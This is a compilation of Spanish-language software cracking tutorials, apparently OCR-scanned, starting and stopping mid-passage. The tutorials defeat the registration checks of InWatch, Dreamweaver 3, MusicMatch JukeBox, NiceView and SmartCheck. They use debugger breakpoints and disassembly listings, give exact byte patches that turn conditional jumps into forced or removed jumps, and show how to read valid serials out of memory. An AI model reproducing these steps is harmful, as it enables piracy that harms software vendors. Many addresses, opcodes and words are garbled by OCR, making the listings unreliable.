memoria el n/s valido, porque cuando un programa nos da el mensaje 
de que el serial no es valido, en ese momento todavía puede estar 
el reg valido en la memoria, claro esta que para mostrar el mensaje 
de error en algún punto hizo la comprobación, entonces rastrearemos 
la memoria en la ventana de datos del softice en busca del posible 
n/s. este es un método un poco pasota pero os aseguro que con muy 
buenos resultados, Y con el MW32dasm convertiremos la ventana donde 
tenemos que escribir el nombre y el numero de registro en un 
generador de S/N validos, ósea que meteremos un nombre cualquiera y 
sin meter n/s pulsaremos el botón que era para registrarnos, y nos 
mostrara el numero valido, curioso no¿? 


AL ATAKE 


PARTE 1 BUSCAR UN S/N VALIDO, DE UNA FORMA POCO USUAL 


Herramientas Softice, W32dasm, HEXedit, primero empezamos con el 
soft, ousease que hemos reiniciado nuestro ordenador y hemos 
cargado el sofice. Bien primero hacer una copia del archivo 
inwatch.exe para luego editarla con el hexedit, ahora cargamos el 
original con el softice, pulsamos el botón de los engranajes y nos 
baos al soft, F5 para vover a windows, aparece el primer nag, 
pulsamos OK y aparece el segundo nag pulsamaos OK y entramos en el 
programa vamos a register y pulsamos register now, y ya nos aparece 
la ventana de registro ( que luego la convertiremos en el generador 
de n/s validos) rellenamos los datos en mi caso pondré 


NAME: karpoff 
Regitration Number : 1212121212 


Y ahora tenemos que poner un breakpoint que detenga la ejecución 
del programa justo cuando este, o aya comparado nuestro numero con 


el valido, que breakPoint poner¿? En anteriores manuales ya 
explique como saber a que funciones externas llama un programa, en 
este caso utilizamos la función messageboxexa, pues pulsamos 
[Ctr14+D] para entrar en el softice y poner nuestro breakpoint 


BPX messageboxexa 


Pulsamos nuevamente [Ctrl1+D] para volver a Windows y pulsamos OK en 
la ventana del registro, inmediatamente el programa llama a la 
función messageboxexa e interrumpe la ejecución del programa 
llevándonos directamente al softice exactamente en 


USER32 MESSAGEBOXEXA 
(LF I¡BFFOZEILC BL3S5 MOWY CL, 35 


Lógicamente estamos dentro de user32.dl1l y necesitamos saber quien 
llamo a esta funcion desde inwatch.exe pues nada mas fácil pulsamos 
F12 y no nos muestra a papa (la rutina padre que llamo a 
messageboxexa) nos saca del softice a windows y nos muestra el 
mensage de que no es correcto nuestro numero, aquí es donde podemos 
empezar a soñar e imaginar y pensar con mucha paz y ciencia, bueno 
como decía esto ya ha hecho la comprobación y ha decidido que somos 
unos chicos/as malos/as, pero seamos aun peores, lo ultimo que 
hicimos en el softice fue pulsar la tecla F12 para que nos llevase 
a la rutina padre que había llamado a messageboxexa y nos saco a 
Windows, bueno pues en cuanto pulsemos aceptar en el mensaje de 
error iremos a parar a la rutina padre ya que esa orden todavía no 
se ha terminado de ejecutar en el softice Pulsemos aceptar y 
entramos al soft en 


:0042B5B2 E8891B0300 Call USER32!!MESSAGEBOXEXA --— LA RUTINA PADRE 
:0042B5B7 57 push edi --- APARECEMOS AQUÍ 


Bueno pues yo sigo pensando que el numero correcto todavía debe de 
estar en memoria, si pulsamos la tecla F2 veréis que en la parte 
superior del softice nos aparece un nuevo apartado con los 
registros y los valores que llevan actualmente algo así 


EAX=XXXXXXXX ESI=XXXXXXXX ECX=XXXXXXXXX ETC. ETC. ETC. 


Si pulsamos con el botón derecho del ratón sobre cualquier registro 
(EAX, EDX, EBX, ECX,ESI, EDI ETC.) o sobre cualquier dato que veáis 
se despliega un menú y si escogéis la opción DISPLAY veréis que en 
la ventana de datos ( en la que se muestran los caracteres) se 
muestra lo que lleva la memoria en ese momento, mi idea es ir 


pulsando en cada registro y rastrear la ventana de datos hacia 
arriba y abajo, Y concretamente si pulsáis sobre ESP y le hacéis 
DISPLAY podéis ver en la ventana de datos y concretamente en la 
parte superior izquierda el numero 15757 claro veréis este numero 
si como nombre escribisteis karpoff, de haber escrito otro nombre 
veréis otro numero con cinco dígitos, seguramente en otros 
registros(EDX, EBP, ) también encontréis el n/s valido, solo que 
tendréis que rastrear arriba y abajo no siempre aparece a la 
primera, y en muchos programas este método no será valido.Bueno 
Pues este era nuestro n/s valido, queda entendido no ¿? hay muchas 
formas de crackear, la limitación la ponemos nosotros, echarle 
imaginación y veréis. 


Los datos del registro se guardan en el archivo C:IWINDOWSX 
inwatch.INI para hacer el siguiente experimento tenéis que 
desregistraros, con borrar el n/s del archivo inwatch.ini ya no 
estaréis registrados. 


PARTE 2 Convertir la ventana de registro en un generador de S/N 
validos 


Pues si con una pequeña modificación en solo dos bytes, haremos que 
la ventana donde metemos el nombre y el s/n para registrarnos se 
convierta en un generador de números validos para el programa 
(curioso no¿?) 


Bueno utilizaremos el W32dasm y un editor HEX, desensamblamos el 
archivo inwatch.exe y con el HEXedit editamos una copia de este 
mismo archivo, ya hemos desensamblado el archivo, sigamos los pasos 
tipicos buscamos el mensaje de * Incorrect Registration Number." Y 


hacemos doble clip, aparecemos en 


* Possible StringData Ref from Data Ob3j ->"Incorrect Registration" 


:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Obj ->"Incorrect Registration 
Number." 


:0042B5AB 682CFA4600 push 0046FA2C -— APARECEMOS AQUI 


:0042B5B0 6A00 push 00000000 


echemos un vistazo encima de este código para ver que hace que se 
imprima este mensaje. 


* Possible StringData Ref from Data Ob3 ->"shownumber" 
| 

:0042B55F 680DFA4600 push 0046FAOD 

:0042B564 FF75F0 push [ebp-10] 

:0042B567 E8B4900200 call 00454620 

:0042B56C 83C408 add esp, 00000008 

:0042B56F 85C0 test eax, eax 

:0042B571 742A Je 0042B59D -— SI NO SALTA GENERA EL S/N 
:0042B573 6A00 push 00000000 

* Possible StringData Ref from Data Obj ->"Registration Number" 
| 

:0042B575 6818FA4600 push 0046FA18 

:0042B57A 8D45CC lea eax, dword ptr [ebp-34] 

:0042B57D 50 push eax 

:0042B57E FF37 push dword ptr [edi] 

:0042B580 E87C4E0100 call 00440401 

:0042B585 83C410 add esp, 00000010 

:0042B588 FF7720 push [edi+20] 

:0042B58B 8B4720 mov eax, dword ptr [edi+20] 

:0042B58E 8B4008 mov eax, dword ptr [eax+08] 

:0042B591 FF908C000000 call dword ptr [eax+0000008C] 


:0042B597 59 pop ecx 


:0042B598 E9A5000000 jmp 0042B642 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0042B571(C) 

:0042B59D 3B5DEC cmp ebx, dword ptr [ebp-14] 

:0042B5A0 741E je 0042B5C0 — SALTO AL MENSAJEE DE ERROR 

:0042B5A2 6A00 push 00000000 

:0042B5A4 6A00 push 00000000 

* Possible StringData Ref from Data Ob] ->*incorrect Registration" 
:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Obj ->"Incorrect Registration 
Number." 


:0042B5AB 682CFA4600 push 0046FA2C -— APARECEMOS AQUI 
:0042B5B0 6A00 push 00000000 


Bueno ya veis no¿? No voy a enrroyarme, mas bien resumiré, tenemos 
un salto en 


0042B5A0 si este salto se ejecuta evitaría el mensaje de error, por 
lo tanto nos registraría cualquier numero, para ello tendríamos que 
cambiar 


0042B5A0 741E je 0042B5C0 por 0042B5A0 EB1E jmp 0042B5C0 


EN realidad esto nos aceptaría el s/n que metamos, incluso nos 
felicita con el típico Tank you for register o similar, pero al 
iniciar nuevamente el programa vemos que no mantiene el registro, 
que puede pasar, pues que hay otra comprobación o la misma pero 
llamado desde otro punto del programa, en cualquier caso no me 


centrare en buscarla eso os lo dejo a vosotros que esta muy fácil. 


Sigamos en 0042B571 742A je 0042B59D otro salto si os fijáis en la 
dirección de memoria a la que apunta vemos que si salta va directo 
al salto que hemos analizado antes , pero si lo eliminamos haciendo 
que no salte entra en el código que genera el s/n valido, y cual 
fue mi sorpresa al ver que si eliminas el salto convierte la 
ventana de registro en un keygen, actuando así, metemos un nombre 
pulsamos ok y en vez de mostrarnos el nag con el aviso de registro 
aceptado o registro fallido nos muestra un nag diciendo su numero 
de registro es tal ( alucinante, nunca vi un programa con este 
comportamiento) bueno para eliminar el salto 0042B571 742A j3e 
0042B59D tendríamos que cambiar los bytes 742A por 9090 solo 
tenemos que ver la dirección del offset e ir al HEXedit Offset 
1BB71 cuando realizeis los cambios salvar el programa ( que es una 
copia del original claro) y veréis cuando intentéis registraros.... 


Espero que lo entendáis todo, no me he querido meter en 
explicaciones profundas por dos razones, una por que ya debéis de 
tener nivel suficiente para llevar a cavo todos estos cambios sin 
las explicaciones detalladas de los anteriores manuales, y dos 
porque en este manual lo que intento es deciros que cualquier forma 
de crackeo es valida, todo lo que se os ocurra vale no os centréis 
solo en los manuales, buscar nuevos métodos de ataque. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_ karpofffhotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son 
ilegales. 


Como crackear el Macromedia Dreamweaver 3 


Hola amigos aca estoy de vuelta con un nuevo tutorial, esta ves de la mano del tan 
amado/odiado por mi y digo lo de odiado por que me cuesta un huevo hacer tutos con 
el!!! Bueno sin mas que decir nos vamos directo al codigo. 

Antes del codigo les quiero dar las gracias ya que la web esta andando de maravilla, 
nos mandan e- mails de todos lados y eso es lo que por lo menos espero yo. Que la 
gente pueda aprender de lo que yo les puedo enseñar que es cracking. Les agradezco 
a todos los e-mail que nos mandaron y que me sigan escribiendo!!! 


Bueno abrimos el Dreamweaver 3, ingresamos a Buy y ponemos todos los datos que 
nos pide (pueden ser reales o no eso lo ven uds), como metodo de envio pongan que 
se los envie por correo. Una vez hecho esto ahora al apretar buy nos saltara otra 
ventana, la de registracion: 


Complete Mail/Fax Payment 


This program ¡is waiting for the unlocking code from ReleaseNow.com. If you have the code, you 
may complete the registration. 
If you have received the unlocking code, please enter it below: 


If you are waiting for an unlocking code, do not press “New Registration” as this will cause your 
personal code to change. 


User information 


First Name [gr00wy Last Name [ar00wy 


Unlocking Code]! 234567890 


Note: Mail and fax payments take 48 hours to process. 


You can reach our Customer Service, 24 hours 7 days a week. 


If you need assistance, please send e-mail to supportMreleasenow.com, or call [650] 622-1499. 


New Registration Cancel 


Una ves llegado a este paso cerramos el Dreamweaver y reiniciamos en MS-DOS para 
luego cargar el sice. 

Una ves cargado el sice abrimos de vuelta el Dreamweaver y ponemos cualquier 
unlocking code, p. ej 1234567890 luego apretamos Ctrl.+ D para ir al SICE. Y poner 
un BPX GETDLGITEMTEXTA (esta funcion sirve para sacar el texto de un textbox y 
nosotros lo que queremos hacer es ver cuando lo saca y como por eso lo ponemos), 
luego F5 para salir del SICE y hacemos clic en OK para ver que el SICE salte como 
loco. 

Ok el sice ya salto pero no estamos en elcodigo de dreamweaver, sino que estamos en 
un lugar que no nos interesa (o sea que estamos en otra librería como kernel32), para 
ir a donde queremos apreta F11 y no llevara a una librería llamada RSALESAGENT o 
algo asi que es la encargada de la protección de dreamweaver. 


Una vez en el codigo del sales agent veremos que hace esto: 


:10005F01 FF1570220210 Call dword ptr [10022270] 
:10005F07 BF6CAO0O0210 mov edi, 1002A06C 
:10005F0C 83C9FF or ecx, FFFEFFFF 
:10005F0OF 33C0 xor eax, eax 
:10005F11 F2 repnz 

:10005F12 AE scasb 

:10005F13 F7D1 not ecx 

:10005F15 49 dec ecx 

:10005F16 83F90A cmp ecx, 0000000A 
/*Compara el Unlcok code con 10 caracteres*/ 
:10005F19 7455 je 10005F70 


/*Salta si son 10 y sino se va a un error*/ 


Tonces como es devido nos fijamos que nuestro unlock code tenga 10 caracterez (y los 
tiene 1234567890) o sino parados en el SICE ponemos R FL Z que va a cambiar el 

FLAG 0 a 1 o viceversa y hara que no salte al error (no lo hagas si tiene 10 caracteres 
tu unlock code por que sino va al error) 

Bueno una vez ejecutado el salto /* je 10005F70*/ paramos en plena comprobación 
del Unlocking Code, lo que tenemos que hacer ahora es ir sondeando los registros a 

ver cual cambia después de una accion sospechosa como por ej una call etc sha 
saben. Bueno mientras sondeo veo una call o sea la primera, me fije en todos los 
registros con D XXX donde XXX es el registro de 32 bits (te doy un consejo: en el sice 
caundo cambia un registro la ventana de registros (si no la ves apreta F2), cambia el 
color del registro modificado, asi que fijate en los que cambian después de una accion 
sospechosa y hacele un D XXX) bueno, sigo sondeando hasta que paso una call /*CALL 
00OCDCF90*/ y hago un D EAX y en la ventana de datos (si no la tenes pone en el SICE 
wd y aparecera) y me aparece YFYRCUMXKI. Bueno, que hacemos pos lo provamos!!! 

Y funciona!!! 

Ahora lo que tenemos que hacer es buscar el serial number, que esta en un archivo 
que se ubica en la carpeta c:1windows1templistmp o algo asi, elarchivo se llama 
serialization.dll (el mismo de arriba) lo desensamblamos y vemos que nos da 
generosamente los serials de algunas aplicaciones Macromedia, sino buscalo en el S2K 
=) 


Bueno espero que les halla gustado ya que me costo mucho subirlo a la page sha que 
no tengo mas telefono y el server de Pórtland anda para el ojete! 


Cracker: grOOvy 
E-mail: garoovy2600WMyahoo.com.ar 


WEB: www.zencracking.com.ar o http://groovycracking.8Sm.com 
Grupo: [zCt!] 


Miembros / Colaboradores: 
JB_Duc, FiReRaln, SerialCode9x 


How 2 Crack MusicMatch JukeBox 6.00.0255 
y 6.10.0194 


Dificultad: Facil + 

Herramientas: Softlce, W32Dasm, HexWorkshop, como ya saben estas las 
bajan de www.ZenCracking.Com.Ar 

Cracker: gr00vy 

E-mail: groovy2600fyahoo.com.ar 

Web: www.ZenCracking.Com.Ar 


Hola a todos, hoy vamos a crackear uno de los mejores programas para 
rippear Mp3 de CD's al HD. 


Comenzemos abriendo el programa y viendo mas o menos como viene la cosa, 
podemos ver que no hay nags ni nada por el estilo, asi que 1 pt para los 
del JukeBox. Ahora una vez que tenemos reconocido el terreno, vamos a los 
palos, abrimos el menu Help/Registration/Enter Key y aparece algo como 
esto: 


MusicMatch Enter Key 


Ok, veamos que pasa si ponemos un S/N cualquiera.... 


MMSECURITY 


Uhmmm nag box que feo... Pero sigamos adelante, desensamblemos el MMJB 
con el W32Dasm y veamos que hay por ahí en las string references. Uhmm 


nada incriminatorio, 2 pts para el Jukebox. Ahora veamos si importa 
alguna dll en especial mirando en Imported Functions pero no, nada 
interesante. Entonces por donde podemos atacar??? No se, lo que podriamos 
hacer es ir al directorio del MMJB y ver que hay. 

Fijémonos en O las d11's, buscamos y buscamos hasta que vemos una que es 
muuuyyy sospechosa MMSecurity.dll, esperen que no es ese el titulo de la 


nag box??? SIIII!!!! Rapidamente desensamblemos esa dll y vemos que es lo 
que hay por ahí. Uhmmm strign references nada, dialog references, nada, 
exported functions... siiii hay un monton de cosas interesantes veamos 
las O 


AdjustCapRunningValue 

GetDemoLimitType (Calcula el máximo de dias que lo podemos usar) 
GetLatestUpgradeKey 

GetMaxBitRate (Traba el maximo de calidad de grabacion a 96 kb/s) 
GetMaxRecordCount (Cant maxima de grabaciones por sesion) 
GetMMJBVersion 

GetMMUID 

GetRecordCount 

GetSKUInfo 

GetUpgradeKey (Obtiene el SN de inet) 

IncrementRecordCount 

InitializeSecurity 

IsRecLimitReached 

ManualUpgradeKey 

QueryCapabilityLimitReached 

QueryCapabilityValue 

QueryPurchaseState 

SetPurchaseState 

SetUpgradeKey (Setea el SN en el registro???) :) 


Uhmmm como vemos es muy interesante esta ultima SetUpgradeKey, veamos que 
hace y cuantas veces es llamada por el programa. Hacemos 2 clics y 
aparecemos por aca: 


* Referenced by a CALL at Address: 


| :67A024B3 

| 

Exported fn(): SetUpgradeKey - Ord:0019h 

:67A022BD 55 push ebp 
:67A022BE 8BEC mov ebp, esp 
:67A022C0 81ECACOO0000 sub esp, 000000AC 
:67A022C6 53 push ebx 
:67A022C7 56 push esi 
:67A022C8 57 push edi 
:67A022C9 E8DF380000 call 67AO5BAD 
:67A022CE 50 push eax 
:67A022CF 8D4DF4 lea ecx, dword ptr [ebp-0C] 


* Reference To: MFC42.Ordinal:1943, Ord:1943h 


:67A022D2 E839370000 Call 67A05A10 


* Possible StringData Ref from Data Obj] ->"MMSECURITY: SetUpgradeKey" 


:67A022D7 68B892A067 push 67A092B8 


:67A022DC E8CB330000 call 67A056AC 
:67A022E1l 8B5D0O8 mov ebx, dword ptr [ebp+08] 
:67A022E4 53 push ebx 


* Reference To: MSVCRT.strlen, Ord:02BEh 


:67A022E5 E8503B0000 Call 67A05E3A 
:67A022EA 59 pop ecx 

:67A022EB 8BF8 mov edi, eax 
:67A022ED 59 pop ecx 

:67A022EE 47 inc edi 

:67A022EF 8D4DBC lea ecx, dword ptr [ebp-44] 
:674022F2 E8SB3EFFFEF call 67A012AA 
:67A022F7 BE9098A067 mov esi, 67A09890 
:67A022FC 53 push ebx 
:67A022FD 8BCE mov ecx, esi 
:67A022FF E801250000 call 67404805 
:67A02304 83F801 cmp eax, 00000001 
:67A02307 0F8500010000 jne 67A0240D 
:67A0230D 57 push edi 
:67A0230E 53 push ebx 
:67A0230F 50 push eax 


Interesante, veamos si hay alguna otra llamada a esta funcion, hacemos 2 
clics mas y vemos que no hay mas asi que nos focalizamos en esta parte 
del codigo y vemos que hay 3 instrucciones que por lo menos a mi me 
llamaron muchisimo la atencion que son: 


:67A022FF E801250000 call 67A04805 
:67A02304 83F801 cmp eax, 00000001 
:67A02307 0F8500010000 jne 67A0240D 


Que es lo que puede estar pasando aca? Para mi que la call genera y 
compara el SN trucho con el origina (anoten esa Call los amantes del 
SICE) si son iguales eax sale con 0 si el SN no es original y sale con 1 
si es original. Entonces que es lo que podemos hacer? Abrir el sice y 
posicionarnos en la call de la dll y cambiar el contenido del registro 
eax para que nos registre? Es una opcion valida pero es muyy larga. 
Tambien podriamos entrar a SICE, entrar a la call y buscar el SN original 
pero tambien es muy larga y no tenemos tiempo asi que pensemos en abrir 
un HexEditor como el HexWorkshop y cambiar el jne por je, probamos 


Via biaios estamos registrados!” !!!! Reiniciamos el programa yseguimos 
registrados!!!! Josha!!! Ahora tenemos un proggie full full si 
restricciones. 


Una informacion adicional, la version 6.10.0194 y la 5 se crackean de la 
misma manera que la 6.0 asi que como pueden ver los de Jukebox estan 
haciendo las cosas mal no??? 


Bueno espero que les haya gustado y que de vez en cuando alguien me mande 
un mail dicendo “Pude crackear el programa gracias a tu tutorial” o algo 
asi como para que yo vea que esto que hago sirve no solo para mi sino 
para la comunidad no??? 


Tutorial N*4 


Programa: NiceView 

Descarga: http:// www.x-screensaver.com 

Objetivo: Obtención de serial 

Herramientas necesaria: Softice ¿ke mas podríamos necesitar? 
Dificultad: Newbie 

Fecha:22/03/03 

Cracker: Prometeo 


Este tutorial está realizado únicamente con fines educativos, y si sé te ocurre por esas casualidades 
realiza este crack ya sea para fines económicos o personales tú eres el único responsable. Demás 
esta decir que si te gusta el programa debes comprarlo. 


Introducción: 


Wenas gente, el soft a crackear hoy es un screen saver no muy bueno a mi modesto entender. Es un 
screen saver ke lo ke hace es mostrarnos fotos de una minitas ke tan muy buenas, cada cierto 
cantidad de tiempo y además podemos seleccionar una de las fotos ke se nos muestra en pantalla 
para colocarla en nuestro desktop. 


Digo ke no es muy bueno este screen saver ya ke presentar fotos cada cierto cantidad de tiempo no 
es una idea muy original y además podemos encontrar en la internet fotos de este estilo de a patadas 
e incluso con mucha mejor calidad y encima sin tener ke pagar x ellas. 


Para registrar este protector de pantalla solo tendremos ke colocar un password ke será siempre el 
mismo ya ke al usuario no le es requerido ningún dato para ke pueda ser generado el pass. 


Hecha la trampa 


Para empezar iniciamos el programa y clickeamos sobre el botón ke dice registrar, luego colocamos 
algún pass trucho ke se nos venga a la mente. Entramos en él el softice con ctrl+d y establecemos un 
break point en getwindowtexta, salimos con F5 y le damos al botón de ok, y ya estamos nuevamente 
dentro del softice; luego presionamos F12 para retornar al código del progi. Lo ke vamos a hacer a 
continuación es eliminar todos lo break point con bc * e ir poniendo break point en la posición en ke 


nos encontremos (x supuesto ke sea parte del programa), para luego presionar F12 y luego 
nuevamente borrar el bpx ke habíamos puesto antes y colocar otro bpx en la instrucción en ke 
estamos (repetimos este método hasta llegar al cartel de error), con lo hecho hasta el momento 
logramos colocar un bpx ke estará muy pero muy cerca de nuestro ventana de error, le damos 
nuevamente al botón de ok para tratar de registra el progi y con el ultimo bpx ke pusimos 
anteriormente utilizando este método caemos en : 


:0040AC4A CC lea edx, dword ptr [esp+0C] <= aterrizamos aquí 


:0040AC4E B958C14600 mov ecx, 0046C158 


:0040AC53 52 push edx 


:0040AC54 E8075F0000 call 00410B60 


:0040AC59 8B00 mov eax, dword ptr [eax] 


:0040AC5B 50 push eax <= mmmmm ke números extraños aparecen 


:0040AC5C 8B44240C mov eax, dword ptr [esp+0C]<= es movido eax 


:0040AC60 50 push eax <= si es nuestro pass trucho 


:0040AC61 EBEEAE0O200 call 00435B54 <= de seguro acá algo pasa 


:0040AC66 83C408 add esp, 00000008 


:0040AC69 8D4C240C lea ecx, dword ptr [esp+0C] 


:0040AC6D 85C0 test eax, eax 


:0040AC6F 0F94C3 sete bl 


:0040AC72 E8B8D40300 call 0044812F 


:0040AC77 84DB test bl, bl 


:0040AC79 “7432 Je 0040ACAD <= si el salto se produce nos mostrara el mensaje 
de Invalid password 


Estando e la dirección:0040AC61 presionamos F8 para ingresar al call 
00435B54 y una ves dentro traceamos con F10 y podremos ver: 


:00435B54 55 push ebp 


:00435B55 8BEC mov ebp, esp 


:00435B57 83EC0C sub esp, 0000000C 


:00435B5A 833D6C0A470000 cmp dword ptr [00470A6C], 00000000 


:00435B61 53 push ebx 


:00435B62 56 push esi 


:00435B63 57 push edi 


:00435B64 7512 j3ne 00435B78 


:00435B66 FF750C push [ebp+0C] 


:00435B69 FF7508 push [ebp+08] 


:00435B6C E86F380000 call 004393E0 <= algo debe pasar aquí dentro 


:00435B71 59 pop ecx 


:00435B72 59 pop ecx 


:00435B73 E96C010000 Jjmp 00435CE4 <=si continuamos nos vamos del call 


Ingresamos nuevamente dentro del otro call con F8 en la dirección:00435B6C y traceamos con F10 
x dentro de la call 004393E0, y podemos ver el siguiente bucle: 


:004393FC 0ACO or al, al <= se realiza la operación or con cada carácter del 
pass pero solo cuando se termina de comprobar el pass el contenido de al es 
O y al realizar la operación lógica or se activa la flag z. 


:004393FE 742E je 0043942E <= si la flag Z fue activada en la instrucción 
anterior, se producirá el salto, y nos llevara a estar registrado =) 


:00439400 8A06 mov al, byte ptr [esi]<= mueve el primer carácter del contenido de esi a 
al, si en el softice colocamos d esi vemos números y letras ¿será el serial correcto acaso? 
ummmmmm 


:00439402 46 inc esi <= incrementa en uno esi 


:00439403 8A27 mov ah, byte ptr [edi] <= mueve el primer carácter del contenido de edi 
a al, si nos fijamos el contenido de edi colocando en el softice d esi (siempre estando sobre la 
instrucción) veremos nuestro pass trucho. 


:00439405 47 inc edi<= incrementa en uno edi 


:00439406 38C4 cmp ah, al <= compara ah y al, si son iguales se activa la flag Z 


:00439408 74F2 je 004393FC <= como si ah y al son iguales la flag z estará activa, y se 
producirá el salto al principio del bucle y se repitira el bucle para comprobar carácter x carácter, hasta 
ke el pass completo sea comprobado (demás esta decir ke si el pass ke colocamos nosotros tiene 
menor cantidad de caracteres ke el serial correcto el salto en 439408 no se producirá ya ke se lo 
considerara como un espacio vació y se lo comparará con el carácter del pass ke le corresponda 
comprobar) y nos iremos con una patada en el trasero a el mensaje de invalid password. 


Nota: estando en la dirección 439406 en donde se produce la comparación entre al y ah lo ke 
podemos ir haciendo es ver el contenido de al (carácter del pass correcto) con tan solo colocar en el 
softice el comando ? al y veremos su valor en hex, dec y ascci respectivamente, lo mismo hacemos 
con ah y vemos el carácter del pass trucho, para evitar tener ke cargar el pass de vuelta podríamos 
sobreescribir el valor del registro ah poniendo en el softice el comando r ah 
el_valor_en_hex_ke vimos_ke tenia_al con esto se producirá el salto ke hay en 439408 comenzando 
de vuelta el bucle y repitiéndose el procedimiento hasta finalizar la comprobación caracteres x carácter 
de nuestro pass con el pass correcto. 


Todo lo dicho resulta innecesario si se quiere evitar ir modificando el contenido del registro en cada 
comprobación que se realice, ya ke es intuitivo ke el pass correcto es el ke encontramos al colocar el 
comando d esi en el softice sobre la dirección 439400. 


Llegamos al fin de esté tuto L 


Notas finales: 


Recuerda solo somos crackers, crackeamos x ke con ello nos divertimos, x ke con ello aprendemos. 
Mucho podrán decir ke esta mal lo ke hacemos o ke no es legal, pero con lo ke hacemos nosotros no 
jodemos ni molestamos a nadie. 


Pero a nosotros no importan las boludeces ke puedan decir los demas; lo ke verdaderamente importa 
es ke el cracking es lo ke mas no gusta, el cracking es nuestra forma de ver las cosas en el mundo, el 
cracking es parte de nosotros. 


Agradecimiento y Saludos: 


Al amigo karpoff, espero ke algún día vuelvas =) 


A toda la gente de CrackNFO 


Karpoff Spanish Tutor 


Programa: Numega smartcheck V.603 

PROTECCION: Name / Serial, Limitacion de Tiempo. 

Descripcion: Debuger para programas en visual basic. 

Dificultad: Novato Avanzado. 

DOWNLOAD : http: //karpoff.tsX.org 

Herramientas: Softice, W32dasm, Editor Hexadecimal 

CRACKER : Fanega. FECHA: 5/6/2000 
INTRODUCCION 


Hola a todos. Ante todo decir que soy nuevo en este arte, y que ha fecha de hoy hace solo dos semanas que empece ha leer 
tutoriales en la web de karpoff. Digo esto por si alguien mas experto lee este tutorial perdone los fallos que pudiera contener. 


Bueno a lo que vamos, con este programa veremos que cuando se nos complican las cosas, bien por que el programador nos 
quiere joder vivos, o por que nuestro conocimiento no da para mas, siempre tenemos otro camino para seguir adelante, o incluso 
cuando mas se empeñan en complicarnos las cosas nos las dan en bandeja. 


Este programa tiene limitacion de tiempo de 45 dias, como primera idea intentaremos hacerle funcionar con cualquier nombre y 
numero de serie. 


AL ATAKE 


Primero instalaremos el programa, durante la instalacion nos pedira nuestro nombre, el de nuestra compañia y el numero 
de serie. Pues metemos los nombres pero no el numero de serie, le damos a next y nos dice que si lo queremos instalar 
como version de demostracion y le decimos que si, el programa se instala perfectamente. 


Bueno vamos a probar este programita, ejucatamos smartcheck y se habre el programa pero no nos muestra ninguna 
pantallita de que estamos en el periodo de evaluacion, cargamos alguna aplicacion y le damos al boton start, lahora¡ ahora 
si que nos enseña una nag screeen informandonos de que nos quedan 45 dias de evaluacion con tres botones (ok, cancel y 
purchase), le damos al purchase y nos enseña otra nag para que metamos nuestro nombre, nombre de compañia y codigo 
de desbloqueo, demosle lo que nos pide metemos un codigo y nombre al azar y pulsamos OK, y por fin lo que 
buscabamos el mensajito tipico de error YOU HAVE ENTERED AN INCORRECT CODE, esto debe ser algo asi como a 
mi no me chulees. 


Paso a seguir, si, si ya se lo que estais pensando nos vamos al w32dasm y buscamos esta cadena en el string ref, muy bien 
hacerlo yo ya lo he echo y no he visto ni torta, recordad que nos es necesario que las rutinas de proteccion esten en el 
ejecutable, ni que esten en otro archivo que este en el mismo directorio que smartcheck como veremos mas adelante. 


Regresemos donde estabamos con el mensaje de error habierto, y le damos a Ok para que se cierre. Habrimos el gran ojo 
que todo lo ve nuestro particular gran hermano, el gran SOFTICE, sabes como se hace no (ctrl+d), metamosle un 
breakpoint para cazar la nag del mensaje de error, empiezo a meterle los tipicos messageboxa, getwindowtexa etc. ¿pero 
que pasa? no me hacepta ninguno que es esto, tras un momento de paron neuralgico, me doy cuenta que al parecer estas 
rutinas de proteccion estan en modo de 16 bytes por eso no me aceptaba ningun breakpoint, sabeis de que hablo ¿no? en 
32 bytes ponemos en los bpx la -a- al final y en modo 16 bytes no, pues metamos -bpx getwindowtext- cerramos el sice 
con FS. Estamos en la pantalla en la que tenemos que darle nuestros datos al smartchek, metemos los que queramos y 
pinchamos sobre OK y salta el sice, hemos acertado con el breakpoint sigamos, pulsamos FS hasta que salte el mensaje de 
error y vemos que salta a la tercera vez de pulsar FS, pues le damos a OK y repetimos todo el proceso cuando aparezca el 
sice pulsamos solo dos veces FS y paramos, vamos a ver quien nos a mandado aqui pulsamos F12 dos veces y aparecemos 
en t132v20 que es el encargado de proteger nuestro programa. 


Nos fijamos en nuestro codigo: 


:10003EDO FF15DC630110 Call dword ptr [100163DC] 

:10003ED6 8D45D8 lea eax, dword ptr [ebp-28] 

:10003ED9 50 push eax 

:10003EDA E885E9FFFF call 10002864 

:10003EDF 83C404 add esp, 00000004 

:10003EE2 8D45EC lea eax, dword ptr [ebp-14] 

:10003EE5 8D4DEC lea ecx, dword ptr [ebp-14] 

:10003EE8 50 push eax ------ lleva nuestro unlock code 

:10003EE9 51 push ecx ------ lleva el codigo bueno 

:10003EEA E891170000 call 10005680 ----- rutina que compara los codigos 

:10003EEF 83C408 add esp, 00000008----------- aparecemos aqui 

:10003EF2 85CO0 test eax, eax 

:10003EF4 7553 ¡ne 10003F49 -------- salta si has sido malo. 

:10003EF6 8D45EC lea eax, dword ptr [ebp-14] 

:10003EF9 50 push eax 

:10003EFA 6885450110 push 10014585 

aparecemos en 015f : 10003EEF despues de una llamada a una rutina que compara los codigos, la siguiente linea del 
codigo es una comprogacion del valor devuelto por esa llamada, y en 015f:1000EF4 el salto nos manda al mensaje de 
error, tendremos que cambiarlo. Pero antes fijemonos un poco mas en el codigo,. arriba de la llamada a la comprobacion 
de los codigos tenemos un push eax y push ecx bueno pues si poneis en el sice - d eax - veremos el numero del codigo que 
habiamos metido, y si ponemos - d ecx - nos enseñara en la pantalla de datos del sice un numero largo que resulta que este 
es el bueno, ¿como puede esta jente hacer esto? por una parte nos lo intentan complicar todo lo que pueden, y por la otra a 
la primera de cambio me entregan el codigo de desbloqueo en bandeja, para mi mejor je je. 


Ahora vosotros direis por que queremos calentarnos mas la cabeza si ya tenemos el numero guay, pues muy sencillo este 
programa cada vez que se instala crea un numero de serie diferente, a partir del cual genera el codigo de desbloqueo, por 
lo tanto este numero no valdria para nuestros amigos o si volvemos a instalarlo no nos serviria, mientras que si reventamos 
el programa y hacemos un parche si que puede valer para siempre a quedado claro. 


Estabamos en que teniamos que cambiar este salto 10003EF4 7553 ¡ne 10003F49 podriamos cambiarlo por un je o por un 
